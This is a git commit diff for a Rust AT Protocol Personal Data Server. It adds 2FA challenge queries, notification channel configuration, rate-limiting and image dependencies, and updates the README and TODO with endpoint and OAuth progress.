Remaining endpoints for MVP

This commit is contained in:
lewis
2025-12-12 19:20:39 +02:00
parent 2ededf32a6
commit b66e4fe291
76 changed files with 8803 additions and 564 deletions

View File

@@ -13,26 +13,27 @@ AWS_SECRET_ACCESS_KEY=minioadmin
PDS_HOSTNAME=localhost:3000
PLC_URL=plc.directory
# A comma-separated list of WebSocket URLs for firehose relays to push updates to.
# e.g., RELAYS=wss://relay.bsky.social,wss://another-relay.com
RELAYS=
# A comma-separated list of relay URLs to notify via requestCrawl when we have updates.
# e.g., CRAWLERS=https://bsky.network
CRAWLERS=
# Notification Service Configuration
# At least one notification channel should be configured for user notifications to work.
# Email notifications (via sendmail/msmtp)
# MAIL_FROM_ADDRESS=noreply@example.com
# MAIL_FROM_NAME=My PDS
# SENDMAIL_PATH=/usr/sbin/sendmail
# Discord notifications (not yet implemented)
# DISCORD_BOT_TOKEN=your-bot-token
# Discord notifications (via webhook)
# DISCORD_WEBHOOK_URL=https://discord.com/api/webhooks/...
# Telegram notifications (not yet implemented)
# Telegram notifications (via bot)
# TELEGRAM_BOT_TOKEN=your-bot-token
# Signal notifications (not yet implemented)
# Signal notifications (via signal-cli)
# SIGNAL_CLI_PATH=/usr/local/bin/signal-cli
# SIGNAL_PHONE_NUMBER=+1234567890
# SIGNAL_SENDER_NUMBER=+1234567890
CARGO_MOMMYS_LITTLE=mister
CARGO_MOMMYS_PRONOUNS=his

View File

@@ -0,0 +1,34 @@
{
"db_name": "PostgreSQL",
"query": "SELECT preferred_notification_channel as \"channel: NotificationChannel\" FROM users WHERE did = $1",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "channel: NotificationChannel",
"type_info": {
"Custom": {
"name": "notification_channel",
"kind": {
"Enum": [
"email",
"discord",
"telegram",
"signal"
]
}
}
}
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false
]
},
"hash": "0cbeeffaf2cf782de4e9d886e26b9884e874735e76b50c42933a94d9fa70425e"
}

View File

@@ -0,0 +1,61 @@
{
"db_name": "PostgreSQL",
"query": "\n INSERT INTO oauth_2fa_challenge (did, request_uri, code, expires_at)\n VALUES ($1, $2, $3, $4)\n RETURNING id, did, request_uri, code, attempts, created_at, expires_at\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "id",
"type_info": "Uuid"
},
{
"ordinal": 1,
"name": "did",
"type_info": "Text"
},
{
"ordinal": 2,
"name": "request_uri",
"type_info": "Text"
},
{
"ordinal": 3,
"name": "code",
"type_info": "Text"
},
{
"ordinal": 4,
"name": "attempts",
"type_info": "Int4"
},
{
"ordinal": 5,
"name": "created_at",
"type_info": "Timestamptz"
},
{
"ordinal": 6,
"name": "expires_at",
"type_info": "Timestamptz"
}
],
"parameters": {
"Left": [
"Text",
"Text",
"Text",
"Timestamptz"
]
},
"nullable": [
false,
false,
false,
false,
false,
false,
false
]
},
"hash": "0d59bd89c410dfceaa7eabcd028415c8f3218755a4cd1730d5f800057b9b369f"
}

View File

@@ -0,0 +1,22 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT two_factor_enabled\n FROM users\n WHERE did = $1\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "two_factor_enabled",
"type_info": "Bool"
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false
]
},
"hash": "180e9287d4e7f0d2b074518aa3ae2c1ab276e486b4c2ebaaac299fa77414ef09"
}

View File

@@ -1,30 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey ASC LIMIT $3",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "rkey",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "record_cid",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Uuid",
"Text",
"Int8"
]
},
"nullable": [
false,
false
]
},
"hash": "243ff4911a7d36354e60005af13f6c7d854dc48b8c0d3674f3cbdfd60b61c9d1"
}

View File

@@ -1,30 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey DESC LIMIT $3",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "rkey",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "record_cid",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Uuid",
"Text",
"Int8"
]
},
"nullable": [
false,
false
]
},
"hash": "2d37a447ec4dbdb6dfd5ab8c12d1ce88b9be04d6c7b4744891352a9a3bed4f3c"
}

View File

@@ -36,7 +36,8 @@
"email_update",
"account_deletion",
"admin_email",
"plc_operation"
"plc_operation",
"two_factor_code"
]
}
}

View File

@@ -1,31 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey > $3 ORDER BY rkey ASC LIMIT $4",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "rkey",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "record_cid",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Uuid",
"Text",
"Text",
"Int8"
]
},
"nullable": [
false,
false
]
},
"hash": "347e3570a201ee339904aab43f0519ff631f160c97453e9e8aef04756cbc424e"
}

View File

@@ -1,31 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey < $3 ORDER BY rkey DESC LIMIT $4",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "rkey",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "record_cid",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Uuid",
"Text",
"Text",
"Int8"
]
},
"nullable": [
false,
false
]
},
"hash": "4343e751b03e24387f6603908a1582d20fdfa58a8e4c17c1628acc6b6f2ded15"
}

View File

@@ -0,0 +1,76 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT id, did, email, password_hash, two_factor_enabled,\n preferred_notification_channel as \"preferred_notification_channel: NotificationChannel\",\n deactivated_at, takedown_ref\n FROM users\n WHERE handle = $1 OR email = $1\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "id",
"type_info": "Uuid"
},
{
"ordinal": 1,
"name": "did",
"type_info": "Text"
},
{
"ordinal": 2,
"name": "email",
"type_info": "Text"
},
{
"ordinal": 3,
"name": "password_hash",
"type_info": "Text"
},
{
"ordinal": 4,
"name": "two_factor_enabled",
"type_info": "Bool"
},
{
"ordinal": 5,
"name": "preferred_notification_channel: NotificationChannel",
"type_info": {
"Custom": {
"name": "notification_channel",
"kind": {
"Enum": [
"email",
"discord",
"telegram",
"signal"
]
}
}
}
},
{
"ordinal": 6,
"name": "deactivated_at",
"type_info": "Timestamptz"
},
{
"ordinal": 7,
"name": "takedown_ref",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false,
false,
false,
false,
false,
false,
true,
true
]
},
"hash": "458c98edc9c01286dc2677fcff82c1f84c5db138fdef9a8e8756771c30b66810"
}

View File

@@ -0,0 +1,22 @@
{
"db_name": "PostgreSQL",
"query": "\n UPDATE oauth_2fa_challenge\n SET attempts = attempts + 1\n WHERE id = $1\n RETURNING attempts\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "attempts",
"type_info": "Int4"
}
],
"parameters": {
"Left": [
"Uuid"
]
},
"nullable": [
false
]
},
"hash": "4d52c04129df85efcab747dfd38dc7b5fbd46d8b83c753319cba264ecf6d7df6"
}

View File

@@ -36,7 +36,8 @@
"email_update",
"account_deletion",
"admin_email",
"plc_operation"
"plc_operation",
"two_factor_code"
]
}
}

View File

@@ -0,0 +1,46 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT id, two_factor_enabled,\n preferred_notification_channel as \"preferred_notification_channel: NotificationChannel\"\n FROM users\n WHERE did = $1\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "id",
"type_info": "Uuid"
},
{
"ordinal": 1,
"name": "two_factor_enabled",
"type_info": "Bool"
},
{
"ordinal": 2,
"name": "preferred_notification_channel: NotificationChannel",
"type_info": {
"Custom": {
"name": "notification_channel",
"kind": {
"Enum": [
"email",
"discord",
"telegram",
"signal"
]
}
}
}
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false,
false,
false
]
},
"hash": "62f66fad54498d5c598af54de795e395f71596a6d6a88d2be64ce86256a9860f"
}

View File

@@ -0,0 +1,14 @@
{
"db_name": "PostgreSQL",
"query": "\n DELETE FROM oauth_2fa_challenge WHERE request_uri = $1\n ",
"describe": {
"columns": [],
"parameters": {
"Left": [
"Text"
]
},
"nullable": []
},
"hash": "6be6cd9d43002aa9e2bd337e26228771d527d4a683f4a273248e9cd91fdfd7a4"
}

View File

@@ -0,0 +1,14 @@
{
"db_name": "PostgreSQL",
"query": "\n DELETE FROM oauth_2fa_challenge WHERE id = $1\n ",
"describe": {
"columns": [],
"parameters": {
"Left": [
"Uuid"
]
},
"nullable": []
},
"hash": "7d1246fb9125ebdfa6d4896942411ea0d6766d6a8840ae2b0589c42c0de79fc5"
}

View File

@@ -0,0 +1,40 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT u.did, u.handle, u.email, ad.updated_at as last_used_at\n FROM oauth_account_device ad\n JOIN users u ON u.did = ad.did\n WHERE ad.device_id = $1\n AND u.deactivated_at IS NULL\n AND u.takedown_ref IS NULL\n ORDER BY ad.updated_at DESC\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "did",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "handle",
"type_info": "Text"
},
{
"ordinal": 2,
"name": "email",
"type_info": "Text"
},
{
"ordinal": 3,
"name": "last_used_at",
"type_info": "Timestamptz"
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false,
false,
false,
false
]
},
"hash": "841452a9e325ea5f4ae3bff00cd77c98667913225305df559559e36110516cfb"
}

View File

@@ -0,0 +1,58 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT id, did, request_uri, code, attempts, created_at, expires_at\n FROM oauth_2fa_challenge\n WHERE request_uri = $1\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "id",
"type_info": "Uuid"
},
{
"ordinal": 1,
"name": "did",
"type_info": "Text"
},
{
"ordinal": 2,
"name": "request_uri",
"type_info": "Text"
},
{
"ordinal": 3,
"name": "code",
"type_info": "Text"
},
{
"ordinal": 4,
"name": "attempts",
"type_info": "Int4"
},
{
"ordinal": 5,
"name": "created_at",
"type_info": "Timestamptz"
},
{
"ordinal": 6,
"name": "expires_at",
"type_info": "Timestamptz"
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false,
false,
false,
false,
false,
false,
false
]
},
"hash": "881b03f9f19aba8f65feaab97570d27c1afd00181ce495a5903a47fbfe243708"
}

View File

@@ -1,40 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT did, password_hash, deactivated_at, takedown_ref\n FROM users\n WHERE handle = $1 OR email = $1\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "did",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "password_hash",
"type_info": "Text"
},
{
"ordinal": 2,
"name": "deactivated_at",
"type_info": "Timestamptz"
},
{
"ordinal": 3,
"name": "takedown_ref",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false,
false,
true,
true
]
},
"hash": "91ab872f41891370baf9d405e8812b8d4cfb0b7555430eb45f16fe550fac4b43"
}

View File

@@ -0,0 +1,23 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT 1 as exists\n FROM oauth_account_device ad\n JOIN users u ON u.did = ad.did\n WHERE ad.device_id = $1\n AND ad.did = $2\n AND u.deactivated_at IS NULL\n AND u.takedown_ref IS NULL\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "exists",
"type_info": "Int4"
}
],
"parameters": {
"Left": [
"Text",
"Text"
]
},
"nullable": [
null
]
},
"hash": "a32e91d22d66deba7b9bfae2c965d17c3074c0eea7c2bf5b1f2ea07ba61eeb3b"
}

View File

@@ -0,0 +1,12 @@
{
"db_name": "PostgreSQL",
"query": "\n DELETE FROM oauth_2fa_challenge WHERE expires_at < NOW()\n ",
"describe": {
"columns": [],
"parameters": {
"Left": []
},
"nullable": []
},
"hash": "bc31134e6927444993555d2f2d56bc0f5e42d3511f9daa00a0bb677ce48072ac"
}

View File

@@ -44,7 +44,8 @@
"email_update",
"account_deletion",
"admin_email",
"plc_operation"
"plc_operation",
"two_factor_code"
]
}
}

207
Cargo.lock generated
View File

@@ -915,8 +915,10 @@ dependencies = [
"dotenvy",
"ed25519-dalek",
"futures",
"governor",
"hkdf",
"hmac",
"image",
"ipld-core",
"iroh-car",
"jacquard",
@@ -985,12 +987,24 @@ version = "0.6.9"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "175812e0be2bccb6abe50bb8d566126198344f707e304f45c648fd8f2cc0365e"
[[package]]
name = "bytemuck"
version = "1.24.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "1fbdf580320f38b612e485521afda1ee26d10cc9884efaaa750d383e13e3c5f4"
[[package]]
name = "byteorder"
version = "1.5.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b"
[[package]]
name = "byteorder-lite"
version = "0.1.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "8f1fe948ff07f4bd06c30984e69f5b4899c516a3ef74f34df92a2df2ab535495"
[[package]]
name = "bytes"
version = "1.11.0"
@@ -1157,6 +1171,12 @@ dependencies = [
"cc",
]
[[package]]
name = "color_quant"
version = "1.1.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "3d7b894f5411737b7867f4827955924d7c254fc9f4d91a6aad6b097804b1018b"
[[package]]
name = "compression-codecs"
version = "0.4.33"
@@ -1819,6 +1839,15 @@ version = "2.3.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "37909eebbb50d72f9059c3b6d82c0463f2ff062c9e95845c43a6c9c0355411be"
[[package]]
name = "fdeflate"
version = "0.3.7"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "1e6853b52649d4ac5c0bd02320cddc5ba956bdb407c4b75a2c6b75bf51500f8c"
dependencies = [
"simd-adler32",
]
[[package]]
name = "ferroid"
version = "0.8.7"
@@ -1907,6 +1936,12 @@ version = "0.1.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2"
[[package]]
name = "foldhash"
version = "0.2.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "77ce24cb58228fbb8aa041425bb1050850ac19177686ea6e0f41a70416f56fdb"
[[package]]
name = "foreign-types"
version = "0.3.2"
@@ -2055,6 +2090,12 @@ version = "0.3.31"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "f90f7dce0722e95104fcb095585910c0977252f286e354b5e3bd38902cd99988"
[[package]]
name = "futures-timer"
version = "3.0.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "f288b0a4f20f9a56b5d1da57e2227c661b7b16168e2f72365f57b63326e29b24"
[[package]]
name = "futures-util"
version = "0.3.31"
@@ -2135,6 +2176,16 @@ dependencies = [
"polyval",
]
[[package]]
name = "gif"
version = "0.14.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "f5df2ba84018d80c213569363bdcd0c64e6933c67fe4c1d60ecf822971a3c35e"
dependencies = [
"color_quant",
"weezl",
]
[[package]]
name = "glob"
version = "0.3.3"
@@ -2169,6 +2220,29 @@ dependencies = [
"web-sys",
]
[[package]]
name = "governor"
version = "0.10.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "6e23d5986fd4364c2fb7498523540618b4b8d92eec6c36a02e565f66748e2f79"
dependencies = [
"cfg-if",
"dashmap 6.1.0",
"futures-sink",
"futures-timer",
"futures-util",
"getrandom 0.3.4",
"hashbrown 0.16.1",
"nonzero_ext",
"parking_lot",
"portable-atomic",
"quanta",
"rand 0.9.2",
"smallvec",
"spinning_top",
"web-time",
]
[[package]]
name = "group"
version = "0.12.1"
@@ -2260,7 +2334,7 @@ checksum = "9229cfe53dfd69f0609a49f65461bd93001ea1ef889cd5529dd176593f5338a1"
dependencies = [
"allocator-api2",
"equivalent",
"foldhash",
"foldhash 0.1.5",
]
[[package]]
@@ -2268,6 +2342,11 @@ name = "hashbrown"
version = "0.16.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100"
dependencies = [
"allocator-api2",
"equivalent",
"foldhash 0.2.0",
]
[[package]]
name = "hashlink"
@@ -2759,6 +2838,34 @@ dependencies = [
"icu_properties",
]
[[package]]
name = "image"
version = "0.25.9"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "e6506c6c10786659413faa717ceebcb8f70731c0a60cbae39795fdf114519c1a"
dependencies = [
"bytemuck",
"byteorder-lite",
"color_quant",
"gif",
"image-webp",
"moxcms",
"num-traits",
"png",
"zune-core",
"zune-jpeg",
]
[[package]]
name = "image-webp"
version = "0.2.4"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "525e9ff3e1a4be2fbea1fdf0e98686a6d98b4d8f937e1bf7402245af1909e8c3"
dependencies = [
"byteorder-lite",
"quick-error",
]
[[package]]
name = "indexmap"
version = "1.9.3"
@@ -3476,6 +3583,16 @@ dependencies = [
"windows-sys 0.61.2",
]
[[package]]
name = "moxcms"
version = "0.7.10"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "80986bbbcf925ebd3be54c26613d861255284584501595cf418320c078945608"
dependencies = [
"num-traits",
"pxfm",
]
[[package]]
name = "multibase"
version = "0.9.2"
@@ -3553,6 +3670,12 @@ dependencies = [
"minimal-lexical",
]
[[package]]
name = "nonzero_ext"
version = "0.3.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "38bf9645c8b145698bb0b18a4637dcacbc421ea49bef2317e4fd8065a387cf21"
[[package]]
name = "nu-ansi-term"
version = "0.50.3"
@@ -3975,6 +4098,19 @@ version = "0.3.32"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "7edddbd0b52d732b21ad9a5fab5c704c14cd949e5e9a1ec5929a24fded1b904c"
[[package]]
name = "png"
version = "0.18.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "97baced388464909d42d89643fe4361939af9b7ce7a31ee32a168f832a70f2a0"
dependencies = [
"bitflags",
"crc32fast",
"fdeflate",
"flate2",
"miniz_oxide",
]
[[package]]
name = "polyval"
version = "0.6.2"
@@ -4131,6 +4267,36 @@ dependencies = [
"unicase",
]
[[package]]
name = "pxfm"
version = "0.1.27"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "7186d3822593aa4393561d186d1393b3923e9d6163d3fbfd6e825e3e6cf3e6a8"
dependencies = [
"num-traits",
]
[[package]]
name = "quanta"
version = "0.12.6"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "f3ab5a9d756f0d97bdc89019bd2e4ea098cf9cde50ee7564dde6b81ccc8f06c7"
dependencies = [
"crossbeam-utils",
"libc",
"once_cell",
"raw-cpuid",
"wasi",
"web-sys",
"winapi",
]
[[package]]
name = "quick-error"
version = "2.0.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "a993555f31e5a609f617c12db6250dedcac1b0a85076912c436e6fc9b2c8e6a3"
[[package]]
name = "quinn"
version = "0.11.9"
@@ -4266,6 +4432,15 @@ version = "0.3.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "d20581732dd76fa913c7dff1a2412b714afe3573e94d41c34719de73337cc8ab"
[[package]]
name = "raw-cpuid"
version = "11.6.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "498cd0dc59d73224351ee52a95fee0f1a617a2eae0e7d9d720cc622c73a54186"
dependencies = [
"bitflags",
]
[[package]]
name = "redox_syscall"
version = "0.5.18"
@@ -5033,6 +5208,15 @@ version = "0.10.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "d5fe4ccb98d9c292d56fec89a5e07da7fc4cf0dc11e156b41793132775d3e591"
[[package]]
name = "spinning_top"
version = "0.3.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "d96d2d1d716fb500937168cc09353ffdc7a012be8475ac7308e1bdf0e3923300"
dependencies = [
"lock_api",
]
[[package]]
name = "spki"
version = "0.6.0"
@@ -6220,6 +6404,12 @@ dependencies = [
"rustls-pki-types",
]
[[package]]
name = "weezl"
version = "0.1.12"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "a28ac98ddc8b9274cb41bb4d9d4d5c425b6020c50c46f25559911905610b4a88"
[[package]]
name = "whoami"
version = "1.6.1"
@@ -6831,3 +7021,18 @@ dependencies = [
"quote",
"syn 2.0.111",
]
[[package]]
name = "zune-core"
version = "0.5.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "111f7d9820f05fd715df3144e254d6fc02ee4088b0644c0ffd0efc9e6d9d2773"
[[package]]
name = "zune-jpeg"
version = "0.5.6"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "f520eebad972262a1dde0ec455bce4f8b298b1e5154513de58c114c4c54303e8"
dependencies = [
"zune-core",
]

View File

@@ -16,6 +16,7 @@ chrono = { version = "0.4.42", features = ["serde"] }
cid = "0.11.1"
dotenvy = "0.15.7"
futures = "0.3.30"
governor = "0.10"
hkdf = "0.12"
hmac = "0.12"
aes-gcm = "0.10"
@@ -47,6 +48,7 @@ tokio-tungstenite = { version = "0.28.0", features = ["native-tls"] }
urlencoding = "2.1"
uuid = { version = "1.19.0", features = ["v4", "fast-rng"] }
iroh-car = "0.5.1"
image = { version = "0.25", default-features = false, features = ["jpeg", "png", "gif", "webp"] }
[features]
external-infra = []

130
README.md
View File

@@ -1,75 +1,103 @@
# Lewis' BS PDS Sandbox
# BSPDS, a Personal Data Server
When I'm actually done then yeah let's make this into a proper official-looking repo perhaps under an official-looking account or something.
A production-grade Personal Data Server (PDS) implementation for the AT Protocol.
This project is a Personal Data Server (PDS) implementation for the AT Protocol.
Uses PostgreSQL instead of SQLite, S3-compatible blob storage, and is designed to be a complete drop-in replacement for Bluesky's reference PDS implementation.
Uses PostgreSQL instead of SQLite, S3-compatible blob storage, and aims to be a complete drop-in replacement for Bluesky's reference PDS implementation.
## Features
In fact I aim to also implement a plugin system soon, so that we can add things onto our own PDSes on top of the default BS.
- Full AT Protocol support, all `com.atproto.*` endpoints implemented
- OAuth 2.1 Provider. PKCE, DPoP, Pushed Authorization Requests
- PostgreSQL, prod-ready database backend
- S3-compatible object storage for blobs; works with AWS S3, UpCloud object storage, self-hosted MinIO, etc.
- WebSocket `subscribeRepos` endpoint for real-time sync
- Crawler notifications via `requestCrawl`
- Multi-channel notifications: email, Discord, Telegram, Signal
- Per-IP rate limiting on sensitive endpoints
I'm also taking ideas on what other PDSes lack, such as an on-PDS webpage that users can access to manage their records and preferences.
## Running Locally
:3
Requires Rust installed locally.
# Running locally
Run PostgreSQL and S3-compatible object store (e.g., with podman/docker):
The reader will need rust installed locally.
```bash
podman compose up db objsto -d
```
I personally run the postgres db, and an S3-compatible object store with podman compose up db objsto -d.
Run the PDS:
Run the PDS directly:
```bash
just run
```
just run
## Configuration
Configuration is via environment variables:
### Required
DATABASE_URL postgres connection string
S3_BUCKET blob storage bucket name
S3_ENDPOINT S3 endpoint URL (for MinIO etc)
AWS_ACCESS_KEY_ID S3 credentials
AWS_SECRET_ACCESS_KEY
AWS_REGION
PDS_HOSTNAME public hostname of this PDS
APPVIEW_URL appview to proxy unimplemented endpoints to
RELAYS comma-separated list of relay WebSocket URLs
| Variable | Description |
|----------|-------------|
| `DATABASE_URL` | PostgreSQL connection string |
| `S3_BUCKET` | Blob storage bucket name |
| `S3_ENDPOINT` | S3 endpoint URL (for MinIO, etc.) |
| `AWS_ACCESS_KEY_ID` | S3 credentials |
| `AWS_SECRET_ACCESS_KEY` | S3 credentials |
| `AWS_REGION` | S3 region |
| `PDS_HOSTNAME` | Public hostname of this PDS |
| `JWT_SECRET` | Secret for OAuth token signing (HS256) |
| `KEY_ENCRYPTION_KEY` | Key for encrypting user signing keys (AES-256-GCM) |
Optional email stuff:
### Optional
MAIL_FROM_ADDRESS sender address (enables email notifications)
MAIL_FROM_NAME sender name (default: BSPDS)
SENDMAIL_PATH path to sendmail binary
| Variable | Description |
|----------|-------------|
| `APPVIEW_URL` | Appview URL to proxy unimplemented endpoints to |
| `CRAWLERS` | Comma-separated list of relay URLs to notify via `requestCrawl` |
Development
### Notifications
just shows available commands
just test run tests (spins up postgres and minio via testcontainers)
just lint clippy + fmt check
just db-reset drop and recreate local database
At least one channel should be configured for user notifications (password reset, email verification, etc.):
The test suite uses testcontainers so you don't need to set up anything manually for running tests.
| Variable | Description |
|----------|-------------|
| `MAIL_FROM_ADDRESS` | Email sender address (enables email via sendmail) |
| `MAIL_FROM_NAME` | Email sender name (default: "BSPDS") |
| `SENDMAIL_PATH` | Path to sendmail binary (default: /usr/sbin/sendmail) |
| `DISCORD_WEBHOOK_URL` | Discord webhook URL for notifications |
| `TELEGRAM_BOT_TOKEN` | Telegram bot token for notifications |
| `SIGNAL_CLI_PATH` | Path to signal-cli binary |
| `SIGNAL_SENDER_NUMBER` | Signal sender phone number (+1234567890 format) |
## What's implemented
## Development
Most of the com.atproto.* namespace is done. Server endpoints, repo operations, sync, identity, admin, moderation. The firehose websocket works. OAuth is not done yet.
```bash
just # Show available commands
just test # Run tests (auto-starts postgres/minio, runs nextest)
just lint # Clippy + fmt check
just db-reset # Drop and recreate local database
```
See TODO.md for the full breakdown of what's done and what's left.
## Project Structure
Structure
```
src/
main.rs Server entrypoint
lib.rs Router setup
state.rs AppState (db pool, stores, rate limiters, circuit breakers)
api/ XRPC handlers organized by namespace
auth/ JWT authentication (ES256K per-user keys)
oauth/ OAuth 2.1 provider (HS256 server-wide)
repo/ PostgreSQL block store
storage/ S3 blob storage
sync/ Firehose, CAR export, crawler notifications
notifications/ Multi-channel notification service
plc/ PLC directory client
circuit_breaker/ Circuit breaker for external services
rate_limit/ Per-IP rate limiting
tests/ Integration tests
migrations/ SQLx migrations
```
src/
main.rs server entrypoint
lib.rs router setup
state.rs app state (db pool, stores)
api/ XRPC handlers organized by namespace
auth/ JWT handling
repo/ postgres block store
storage/ S3 blob storage
sync/ firehose, relay clients
notifications/ email service
tests/ integration tests
migrations/ sqlx migrations
## License
License
idk
TBD

86
TODO.md
View File

@@ -81,6 +81,9 @@ Lewis' corrected big boy todofile
- [x] Implement `com.atproto.sync.listBlobs`.
- [x] Crawler Interaction
- [x] Implement `com.atproto.sync.requestCrawl` (Notify relays to index us).
- [x] Deprecated Sync Endpoints (for compatibility)
- [x] Implement `com.atproto.sync.getCheckout` (deprecated).
- [x] Implement `com.atproto.sync.getHead` (deprecated).
## Identity (`com.atproto.identity`)
- [x] Resolution
@@ -108,14 +111,17 @@ Lewis' corrected big boy todofile
- [x] Implement `com.atproto.moderation.createReport`.
## Temp Namespace (`com.atproto.temp`)
- [ ] Implement `com.atproto.temp.checkSignupQueue` (signup queue status for gated signups).
- [x] Implement `com.atproto.temp.checkSignupQueue` (signup queue status for gated signups).
## Misc HTTP Endpoints
- [x] Implement `/robots.txt` endpoint.
## OAuth 2.1 Support
Full OAuth 2.1 provider for ATProto native app authentication.
- [x] OAuth Provider Core
- [x] Implement `/.well-known/oauth-protected-resource` metadata endpoint.
- [x] Implement `/.well-known/oauth-authorization-server` metadata endpoint.
- [x] Implement `/oauth/authorize` authorization endpoint (headless JSON mode).
- [x] Implement `/oauth/authorize` authorization endpoint (with login UI).
- [x] Implement `/oauth/par` Pushed Authorization Request endpoint.
- [x] Implement `/oauth/token` token endpoint (authorization_code + refresh_token grants).
- [x] Implement `/oauth/jwks` JSON Web Key Set endpoint.
@@ -132,12 +138,13 @@ Full OAuth 2.1 provider for ATProto native app authentication.
- [x] Client metadata fetching and validation.
- [x] PKCE (S256) enforcement.
- [x] OAuth token verification extractor for protected resources.
- [ ] Authorization UI templates (currently headless-only, returns JSON for programmatic flows).
- [ ] Implement `private_key_jwt` signature verification (currently rejects with clear error).
- [x] Authorization UI templates (HTML login form).
- [x] Implement `private_key_jwt` signature verification with async JWKS fetching.
- [x] HS256 JWT support (matches reference PDS).
## OAuth Security Notes
I've tried to ensure that this codebase is not vulnerable to the following:
Security measures implemented:
- Constant-time comparison for signature verification (prevents timing attacks)
- HMAC-SHA256 for access token signing with configurable secret
@@ -151,12 +158,12 @@ I've tried to ensure that this codebase is not vulnerable to the following:
- All database queries use parameterized statements (no SQL injection)
- Deactivated/taken-down accounts blocked from OAuth authorization
- Client ID validation on token exchange (defense-in-depth against cross-client attacks)
- HTML escaping in OAuth templates (XSS prevention)
### Auth Notes
- Algorithm choice: Using ES256K (secp256k1 ECDSA) with per-user keys. Ref PDS uses HS256 (HMAC) with single server key. Our approach provides better key isolation but differs from reference implementation.
- [ ] Support the ref PDS HS256 system too.
- Token storage: Now storing only token JTIs in session_tokens table (defense in depth against DB breaches). Refresh token family tracking enables detection of token reuse attacks.
- Key encryption: User signing keys encrypted at rest using AES-256-GCM with keys derived via HKDF from MASTER_KEY environment variable. Migration-safe: supports both encrypted (version 1) and plaintext (version 0) keys.
- Dual algorithm support: ES256K (secp256k1 ECDSA) with per-user keys AND HS256 (HMAC) for compatibility with reference PDS.
